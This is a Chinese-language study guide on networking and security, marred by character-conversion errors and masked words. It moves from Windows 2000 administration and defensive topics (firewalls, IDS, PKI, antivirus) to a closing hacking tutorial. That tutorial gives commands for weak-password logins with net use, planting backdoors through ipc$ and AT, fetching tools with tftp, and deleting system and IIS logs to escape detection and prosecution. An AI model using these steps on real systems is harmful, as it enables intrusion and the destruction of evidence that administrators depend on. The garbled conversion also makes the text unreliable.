***必需要掌握的計算機知識

***必需要掌握的計算機知識 ***必需要掌握哪些計算機知識？ 基礎： 如何去學習 ·要有學習目標 ·要有學習計劃 ·要有正確的心態 ·有很強的自學能力 學習目標 ·1.明確本身的發展方向(你如今或者未來要作什麼,程序員?安全專家?網絡***等) ·2.本身目前的水平和能力有多高 ·能簡單操做windows2000 ·能簡單配置windows2000的一些服務 ·能熟練的配置Windows2000的各類服務 ·能熟練配置win2000和各類網絡設備聯網 ·能簡單操做Linux,Unix,Hp-unix, Solaris中的一種或者多種操做系統 ·能配置cicso,huawei,3com,朗迅等網絡設備 ·會簡單編寫C/C++,Delphi,Java,PB,VB,Perl ·能簡單編寫Asp,Php,Cgi和script,shell腳本 ·3.必須學會不相信態度,尊重各類各樣的能力 ·不要爲那些裝模作樣的人浪費時間 ·尊重別人的能力, ·會享受提升本身能力的樂趣. ·在知道了本身的水平和能力以後就要開始本身的目標了 ·--------安全專家 ·--------*** ·--------高級程序員 ·***是建設網絡,不是破壞網絡, 破壞者是駭客; ·***有***的技術,可是他們是維護網絡的,因此和安全專家是差很少的; ·由於懂得如何***才知道如何維護 ·由於懂得如何維護才更要了解如何*** ·這是 ***與安全專家的聯繫 ·但,他們都是在會編程的基礎上成長的! ·下面咱們開始咱們的學習計劃! 學習計劃 有了學習計劃才能更有效的學習 安全學習計劃 不奢求對win98有多麼精通,咱們也不講解win98如何應用,如何精通,咱們的起步是win2000 s erver,這是咱們培訓的最低標準,你對英語有必定的瞭解也是必不可少 最基礎 ·a.會裝win2000,知道在安裝的時候有兩種分區格式,NTFS與FAT32 及他們的區別,知道win2 000能夠在安裝的時候分區,格式化硬盤, 能夠定製安裝,能夠定製本身須要安裝的一些組件 ,若是有網絡適配器,能夠直接加入域中 學習點:NTFS和FAT32分區的不一樣 各個組件的做用 域的定義 ·b.知道如何開,關機 知道註銷的用處 ·c.知道win2000下面各主要目錄的做用 Documents and Settings,WINNT,system32 Progra m Files ·d.知道管理工具裏面各個組件的定義 ·e.學會應用命令提示符cmd(dos) ·f.知道計算機管理裏面的各個選項的不通 ·g.知道win2000強大的網絡管理功能 ·h.能很是熟練的操做win2000 ·i.知道IP地址,子網掩碼,網關和MAC的區別 進階 ·A.配置IIS,知道各個選項的做用 ·B.配置DNS,DHCP ·C.配置主控制域,輔助域 ·D.配置DFS ·E.配置路由和遠程訪問 ·F.配置安全策略IPSEC ·G.配置service(服務) ·H.配置磁盤管理,磁盤分額 ·i. 配置RAID(0,1,0+1,5) ·J.路由器的安裝與簡單配置 ·K.交換機的安裝與簡單配置 ·L.常見的×××,VLAN,NAT配置 ·M.配置常見的企業級防火牆 ·N.配置常見的企業級防病毒軟件 高級 ·以前咱們學到的是任何一個想成爲網絡安全專家和***基本知識中的一部分 ·你做到了嗎?? ·若是你作到了,足以找到一份很不錯的工做! 配置負載均衡 ·配置WIN2000+IIS+EXCHANGE+MSSQL+SERVER-U+負載均衡+ASP(PHP.CGI)+CHECK PIONT(ISA SERVER) · ·配置三層交換網絡 · ·配置各類複雜的網絡環境 ·能策劃一個很是完整的網絡方案 · ·能獨自組建一個大型的企業級網絡 · ·能迅速解決網絡中出現的各類疑難問題 結束 ·在你上面的都學好了,你已是一個高級人才了,也是咱們VIP培訓的目標! ·能夠找到一份很是好的工做 ·不會再由於給女友買不起玫瑰而發愁了! 安全： 導讀 ·系統安全服務(SYSTEM) ·防火牆系統(FIREWALL) ·***檢測(IDS) ·身份驗證(CA) ·網站監控和恢復(WEBSITE) ·安全電子商務(E-BUSINESS) ·安全電子郵件(E-MAIL) ·安全辦公自動化(OA) ·Internet訪問和監控(A&C) ·病毒防範(VIRUS) ·虛擬局域網(×××) 系統安全服務 ·系統安全管理 ·系統安全評估 ·系統安全加固 ·系統安全維護 ·安全技能學習 系統安全管理 ·信息系統安全策略 ·信息系統管理員安全手冊 ·信息系統用戶安全手冊 ·緊急事件處理流程 系統安全評估 一、系統總體安全分析 · 分析用戶的網絡拓撲結構，以找出其結構性及網絡 配置上存在的安全隱患。 · 經過考察用戶信息設備的放置場地，以使得設備物理上是安全的。 · 分析用戶信息系統的管理、使用流程，以使得系統 可以安全地管理、安全地使用 二、主機系統安全檢測 · 經過對主機進行安全掃描，以發現系統的常見的安全漏洞。 · 對於特定的系統，採用特別的工具進行安全掃描。 · 根據經驗，對系統存在的漏洞進行綜合分析。 · 給出系統安全漏洞報告。 · 指出各個安全漏洞產生的緣由以及會形成的危險。 · 給出修復安全漏洞的建議 三、網絡設備安全檢測 · 經過對網絡進行安全掃描，以發現網絡設備的安全漏洞。 · 根據經驗，對網絡設備存在的漏洞進行綜合析。 · 給出網絡設備安全漏洞報告。 · 指出各個安全漏洞產生的緣由以及會形成的險。 · 給出修復安全漏洞的建議。 安全系統加固 ·爲用戶系統打最新安全補丁程序。 ·爲用戶修復系統、網絡中的安全漏洞。 ·爲用戶去掉沒必要要的服務和應用系統。 ·爲用戶系統設置用戶權限訪問策略。 ·爲用戶系統設置文件和目錄訪問策略。 ·針對用戶系統應用進行相應的安全處理。 安全系統維護 ·防火牆系統維護，安全日誌分析 ·IDS系統維護，安全日誌分析 ·×××系統維護，安全日誌分析 ·認證系統維護，安全日誌分析 ·服務器、主機系統，安全日誌分析 ·其它各種安全設施維護及日誌分析 安全技能培訓 ·網絡安全基礎知識 ·網絡***手段演示和防範措施 ·防火牆的原理和使用 ·×××的原理和使用 ·漏洞掃描工具的原理和使用 ·IDS（***檢測系統）的原理和使用 ·身份認證系統的原理和使用 ·防病毒產品的原理和使用 ·系統管理員安全培訓 ·通常用戶安全培訓 防火牆系統 ·防火牆的定義 ·防火牆的分類 ·包過濾防火牆 ·應用網關防火牆 ·狀態檢測防火牆 ·通常企業防火牆配置 ·政府機構防火牆配置 ·涉密網絡保密網關配置 ·高可用性和負載均衡防火牆系統 ·高速防火牆系統 防火牆的定義 ·用以鏈接不一樣信任級別網絡的設備。 ·用來根據制定的安全規則對網絡間的通訊進行控制 防火牆的分類 ·包過濾 (Packet Filters) ·應用網關 (Application Gateways) ·狀態檢測(Stateful Inspection) 包過濾防火牆 ·包 過 濾 技 術 ·主要在路由器上實現，根據用戶定義的內容（如IP地址、端口號）進行過濾。包過濾在網 絡層進行包檢查與應用無關。 · 優 點 · 具備良好的性能和可伸縮性。 · 缺點 · 因爲包過濾技術是對應用不敏感的，沒法理解特定通信的含義，於是安全性不好。 應用網關防火牆 ·應用網關技術 ·第二代防火牆技術，其在應用的檢查方面有了較大的改進,能監測全部應用層，同時對應 用「內容」（Content Information）的含義引入到了防火牆策略的決策處理。 · 優勢 · 安全性比較高。 · 缺點 · 一、該方法對每個請求都必須創建兩個鏈接，一個從客戶端到防火牆系統，另外一個從 防火牆系統到服務器，這會嚴重影響性能。 · 二、防火牆網關暴露在***者之中。 · 三、對每個代理須要有一個獨立的應用進程或 daemon 來處理， 這樣擴展性和支持 新應用方面存在問題。 檢測狀態防火牆 · 屬第三代防火牆技術，克服了以上兩種方法的缺點，引入了OSI全七層監測能力，同時 又能保持 Client/Server的體系結構，也即對用戶訪問是透明的。 · 防火牆能保護、限制其餘用戶對防火牆網關自己的訪問。 · 狀態檢測技術在網絡層截獲數據包後交給INSPECT Engine,經過 INSPECT Engine 能夠 從數據包中抽取安全決策所需的全部源於應用層中的狀態相關信息，並在動態狀態表中 維 持這些信息以提供後繼鏈接的可能性預測。該方法能提供高安全性、高性能和擴展性、高伸 縮性的解決方案。 ***檢測系統 ·處理***時遇到的典型問題 ·解決***的方法和手段 ·基於網絡的***檢測 ·基於主機的***檢測 ·***檢測系統典型配置 處理***時遇到的問題 ·得到的信息不足 ·不知到網絡上發生了什麼事。 ·沒法斷定系統是否已經被***。 ·信息不許確 ·人員少 ·沒有足夠的人員維護管理。 ·缺少規範的處理程序 ·發現***時如何反應? ·下一步該如何處理? 解決***的方法和手段 ·採用***實時***監控系統（IDS） ·對系統、網絡中發生的事件進行實時監控。 ·當發生***事件時能即時反應。 ·對***事件進行詳細記錄並跟蹤。 基於主機的***檢測 ·軟件模塊安裝在包含有重要數據的主機上 ·監視操做系統的日誌以發現***的特徵。 ·監視代理所處主機上的全部進程和用戶. ·監視暴力登陸***（brute-force login）, 試圖改變或繞過安全設定，及特權的濫用等 。 ·當新的日誌產生時，爲了減少對CPU的影響，代理程序暫時中斷。 基於網絡的***檢測 ·軟件安裝在專門的主機上，放置於關鍵的網段 ·將配置該軟件主機的網卡設置爲混雜模式，使得該主機能接受網段上全部的包。 ·分析數據包以判斷是否有******。 ·監視網段上的全部數據。 ·對網絡的流量無任何影響。 ·能檢測到 denial of service attacks, unauthorized access attempts, pre-attack s cans等***。 身份認證系統 ·用戶身份認證的方法 ·不一樣認證方法的安全級別 ·用戶身份認證的經常使用方式 ·解決問題的方法 ·目前比較成熟的雙因素認證方法 用戶身份驗證 ·你知道的一些東西 · 密碼, ×××號，生日 ·你有的一些東西 · 磁卡, 智能卡,令牌, 鑰匙 ·你獨有的一些東西 · 指紋,聲音，視網膜 密碼是不安全的 ·能夠破解密碼的工具太多 ·大多密碼在網絡中是明文傳輸的 ·密碼能夠網絡離線時被窺測 ·密碼和文件從PC和服務器上被轉移了 ·好記的密碼容易被猜到,不易猜想的密碼又太難記 解決方法 ·使用混合的工具:如IC卡+PIN 網站監控與恢復系統 ·典型的Web服務器應用 ·Web服務器存在的安全問題 ·網站安全解決方法 典型web服務器應用 ·Internet-->路由器-->防火牆-->web站點 · | · | · 內部網 ·全部的放在防火牆後面 Web服務器存在的安全問題 · 網頁被非法篡改是網站內容提供者最頭痛的問題。在採用防火牆後，Web服務器自己的漏 洞成爲了網站被黑的主要問題。 · Web應用服務器(如IIS,Apache中存在着大量的安 全漏洞.) · 用戶本身開發的CGI、ASP、PHP應用中存在着大量潛在的漏洞。 網站安全 ·採用Web服務器監控與恢復系統 ·該系統提供對網站文件內容的實時監控，發現被改動後當即報警並自動恢復。 電子商務安全系統 ·典型的電子商務應用 ·電子商務中存在的安全問題 ·電子商務的安全解決方法 ·實時數據交換系統 典型電子商務應用 ·Internet--->防火牆--->Web服務器 · || | · || | · 內部網(數據庫) 電子商務中存在的安全問題 ·一、Web服務器端 ·Web應用服務器（如IIS、Apache中存在着大量的安全漏洞。用戶本身開發的CGI、ASP、PH P應用中存在着潛在的漏洞。 · ***經過這些漏洞***Web服務器，可非法篡改網頁，形成惡劣影響，動搖了電子商務使 用者的信心。 · 甚至可得到Web服務器上大量的敏感資料，如用戶的信用卡號，用以鏈接內部數據庫的賬 號和口令。 · 可能經過控制Web服務器，來***內部數據庫。 電子商務中存在的安全問題 ·二、SSL協議 ·SSL加密強度低。因爲瀏覽器默認的加密模塊只支持40位的低強度加密，並且即便在瀏覽 器中安裝更高位的加密模塊，因爲WEB服務器不提供對高位SSL連接的支持一樣沒法實現高強 度SSL加密連接。 · 沒法解決電子商務中的用戶簽名。SSL連接創建WEB服務器和用戶瀏覽器之間的安全通道 只能保證在安全通道內的信息不被竊聽或篡改，並不能對用戶發送的信息進行簽名以保證信 息的有效性和不可抵賴性，而這正是電子商務中必須解決的問題。 電子商務的安全解決方法 ·將WEB服務器分爲兩部分：通常內容的WEB服務器和交易WEB服務器。 · 通常內容的WEB服務器放置在DMZ區內，採用WEB站點監控和恢復系統保護，防止主頁被非 法改動。 · 交易WEB服務器放置在內部網內，經過一臺物理分隔的實時數據交換系統將其與DMZ區相 連。 · 在客戶機和服務器端安裝SSL代理，從而得到128位的高強度加密通道 實時數據交換系統 ·將系統外部 Web服務器和內部應用Web服務器物理隔開. ·外部Web服務器用於存放通常的信息，內部Web服 務器用於存放敏感信息，並和內部數據 庫鏈接。 ·外部用戶經過http訪問位於DMZ區內的通常Web服務器。 ·當進行交易時，用戶需訪問位於內部網內的應用服務器。 ·https鏈接首先到達實時數據交換系統的虛擬外部Web服務器，實時數據交換系統將https 協議解開，只將https鏈接的數據內容拷貝到虛擬內部Web服務器，虛擬內部Web服務器將使 用該數據從新發起https鏈接到實際的內部應用Web服務器. ·內外經過實時數據交換系統進行數據交換，無任何協議和鏈接穿過實時數據交換系統。 ·即便DMZ區的Web服務器受到***, ***者也的不到任何有用的信息 安全電子郵件系統 ·電子郵件的安全問題 ·安全電子郵件的解決方法 ·一個安全郵件的使用過程 電子郵件的安全問題 ·如何保證發送的敏感信息不被泄漏 ·如何保證發送的信息不被篡改 ·如何確認發件人的真實身份 ·如何防止發件人的抵賴行爲 安全電子郵件的解決方法 ·將PKI體系應用到郵件系統中 ·郵件的加密和解密以實現數據的保密。 ·郵件的數字簽名（鑑別）實現發件人認證和不可抵賴。 ·完整性校驗功能防止信息傳輸過程當中被篡改可*的安全性。 ·採用公開密鑰和對稱密鑰相結合的密鑰體系。 ·支持128bit對稱密鑰算法和1024bit公開密鑰算法。 辦公自動化系統的安全問題 · 如何保證發送的敏感信息不被泄漏 · 如何保證發送的信息不被篡改 · 如何確認發件人的真實身份 · 如何防止發件人的抵賴行爲 安全辦公自動化系統的解決方法 ·將PKI體系應用到辦公自動化系統中 ·工做流信息的加密和解密以實現數據保密 ·工做流信息的數字簽名（鑑別）實現發件人認證和不可抵賴。 ·完整性校驗功能防止信息傳輸過程當中被篡改可*的安全性。 ·採用公開密鑰和對稱密鑰相結合的密鑰體系 ·支持128bit對稱密鑰算法和1024bit公開密鑰算法。 Internet訪問及控制系統 ·Internet使用存在的問題 ·Internet使用的解決方法 ·內容緩存系統 ·Internet站點過濾系統 Internet訪問存在的問題 ·Internet接入帶寬不足，訪問比較慢。 ·大量的用戶訪問相同的內容，形成帶寬的進一步擁擠。 ·在上班時間裏大量的Internet訪問是與業務無關的。 ·有人使用公司的Internet系統訪問×××網站。 ·有人使用公司的Internet系統訪問反動站點。 ·管理人員沒法知道Internet系統的使用狀況。 Internet訪問的解決方法 · 對於問題一，採用內容緩存系統。 · 對於問題二，採用Internet 站點過濾系統。 內容緩存系統 ·一、Client 發起http鏈接請求 ·二、Proxy 收到請求後將檢查內部緩存內是否有所需內容，如有，則返還給Client。 ·三、若無，則Proxy根據請求向目的服務器發起請求。 ·四、Web服務器將內容返回到Proxy服務器。 ·五、Proxy服務器將獲得的內容發回給Client，並在本身的緩存中保存一份。 Internet站點過濾系統 (一) ·一、Client 發起http鏈接請求 ·二、鏈接到達防火牆時防火牆將URL送到WebSense Server 檢查。 ·三、WebSense 將審查結果返回到防火牆。 ·四、防火牆根據其策略決定是否讓該鏈接經過。 Internet站點過濾系統 (二) ·一、Client 發起http鏈接請求 ·二、Proxy 受到請求後將URL送到WebSense Server檢查。 ·三、Proxy根據返回的結果決定是否接收該鏈接請求。 病毒防範系統 · 互連網時代對防病毒系統的要求 · 計算機病毒解決方法 · 典型病毒防範系統部署 互聯網時代對防病毒系統的要求 · 因爲計算機的聯網使用，使得病毒傳播的途徑大爲增多：網絡文件共享、電子郵件、Int ernet文件下載，傳播速度也大爲加快。 · 新病毒的出現速度加快，用戶的防病毒軟件的病毒特徵碼沒能及時更新。 · 目前已出現了惡意的Java、ActiveX，當使用者瀏覽到包含這些代碼的網頁時，會形成安 全問題。 · 一些來歷不明的電子郵件程序或下載的程序中帶有特洛依***，可能會形成受害者的主 機被他人控制。 計算機病毒解決方法 · 從系統的觀點考慮病毒的防範，在全部病毒傳輸的途徑上均配置防病毒軟件，如客戶端 （Win9八、 · Win2000)、文件服務器（NT、Netware）、郵件服務器（Exchange、Lotus Notes）、Internet接入系統（Proxy、Firewall)等。 · 整個病毒防範系統採用集中管理的方式，病毒特徵碼統一更新，安全策略集中設定，從 而使得整個網絡系統的病毒特徵碼獲得快速更新。 · 經過在客戶端的瀏覽器和Proxy、Firewall中嵌入病毒檢查軟件，來防範下在程序中帶有 的病毒和可能的惡意Java、ActiveX等可執行代碼的***。 ×××（虛擬私有網） · 數據加密分類 · 物理線路加密 · 數據鏈路加密 · 網絡層加密—IPSec · 傳輸層加密—SSL 數據加密類型 ·物理層->物理層 物理線路加密 ·數據鏈路層->數據鏈路層 (路由器訪問) ·在數據鏈路層(如PPP）進行加密 L2TP、PPTP、L2F ·網絡層->網絡層(路由器 防火牆 主機) ·在網絡層 （如IP）進行加密 IPSec ·傳輸層->傳輸層 (對TCP進行加密 SSL) ·應用層->應用層(在應用層 (如TCP）進行加密 S/MIME、SET、SSH) 物理線路加密 · DDN 加密機 · 幀中繼加密機 · 異步撥號Modem · ISDN線路密碼機 · ATM加密機 注:傳輸層加密 ·Secure Sockets Layer (SSL) 是一個端到端的Internet 安全協議，經過採用數字證書， 它提供了數據加密、身份認證的功能。SSL創建在傳輸層，它爲客戶機和服務器在應用級建 立起一個端到斷的安全會話。 ·SSL代理—128位的高強度加密模塊 結束語·恭喜你: ·學完這些而且能夠熟練應用,已是一個真正的網絡安全專家了! ·但願此時的你旁邊有個溫柔稍有點調皮的女友,爲這孤獨而寂寞的網絡添加一點跳動的 色彩! ***編： 必需要掌握的幾個命令 ·Net ·netsh ·Ftp ·hostname ·Telenet(nc) ·tracert ·At ·Tftp ·Netstat ·Regedit ·Ping 必需要掌握的幾個協議 ·http ·dns ·ftp ·Pop ·Smtp ·Icmp ·Udp ·tcp 開始 ·掌握了******的方式和手段後,那麼學習***就簡單多了! ·由於你掌握了這些,剩餘的就是使用工具*** ·熟悉掌握一套本身用的***工具 高級 ·本身編寫專用的***工具 ·本身發現系統漏洞 ******手段 ·收集信息: · 收集要***的目標信息 · IP,域名,端口,漏洞,位置 弱口令 ·在nt\2000\xp\2003中弱口令能夠用 ·Net use \ip 「password」 /user:user ·若是目標機開3389服務,能夠直接鏈接 ·在sql的sa弱口令,能夠用sql鏈接器直接 ·登錄 後門*** ·若是有ipc$共享,能夠copy過去***後門 ·用at啓動 ·AT \ip time /INTERACTIVE ·若是能夠獲得shell,也能夠用tftp ·Tftp.exe –i ip get *.* *.* ·而後直接安裝 ·若是有3389,能夠本身建一個iis,下載 直接運行 密碼破解 ·遠程破解mysql,mssql,ftp,mail,共享密碼 ·本地破解管理員(administrator)密碼 緩衝溢出 ·能夠用緩衝溢出***, ·好比流行的webdev,rdcom模塊漏洞 ·能夠直接獲得system管理權限 ·緩衝溢出後的通常現象是: ·Microsoft Windows 2000 [Version 5.00.2195] (C) Copyright 1985-2000 Microsoft Corp. C:\WINNT\system32> Web服務漏洞 ·例如: ·Unicode漏洞遍歷磁盤和執行程序 ·二次編碼漏洞遍歷磁盤和執行程序 ·.HTR漏洞查看源代碼 嗅探監聽 ·例如: ·針對web監聽 ·針對mail監聽 ·工具如:sinffer , iris 欺騙*** ·例如: ·運用arp欺騙*** 假裝欺騙 ·常見的如:mail病毒 ·把一個文件更名字甚至圖標,欺騙對方執行 社會工程學 ·例如: ·QQ聊天誘惑 ·EMAIL信息 ·電話 ·誘惑 拒絕服務 ·例如: ·Dos*** ·Ddos*** 利用跳板 ·利用本身的肉雞做爲跳板***別的機器 ·My PC------>跳板(肉雞)--->目標 路由器漏洞 ·如: ·原始密碼 ·程序漏洞 防火牆 ·利用欺騙***防火牆,致使防火牆功能失效 ·利用防火牆的模塊漏洞 unix/linux ·NetWare Linux unix solais Solaris hp-unix Aix 等 ·這些目前先不講解 精通***工具 ·必須有一套本身能夠徹底掌握的***工具 ·如端口掃描 Nscan,bluescanport ·監聽工具:sinffer iris ·telnet工具:nc ·掃描工具:sss,nmap, LANguard ·後門工具:radmin,winshell ·密碼破解:lc4 ·遠程管理:pcanywhere ·會使用各類經典的***工具 清除日誌 ·在你***機器之後,離開的時候,要徹底清除 ·本身在那臺機器上留下的痕跡 ·例如清除 ·Del C:\WINNT\system32\LogFiles\*.* ·Del C:\WINNT\system32\*.log ·Del C:\WINNT\system32\*.txt ·Del C:\WINNT\*.log ·Del c:\winnt\*.txt 若是你不清除日誌 ·當目標機器的管理員發現你的證據 ·徹底可讓你在大牆內渡過一段日子 *** ·當你徹底掌握這些後 ·你就成爲了一名小*** 高級 ·編寫本身的***工具 ·發現系統漏洞 高級*** ·目前你足以成爲一個高級***了 真正的*** ·精通各類網絡協議 ·精通操做系統 ·精通編程技術 ·精通安全防禦 ·不搞破壞 ·挑戰技術難題 結束 ·想學好這些,並非*別人給你的,而是*本身的努力,本身的自學獲得的! ·別人只能指導你,怎麼去作,只能告訴方法, ·真正的實施是你本身,通過N*N個日夜努力換來的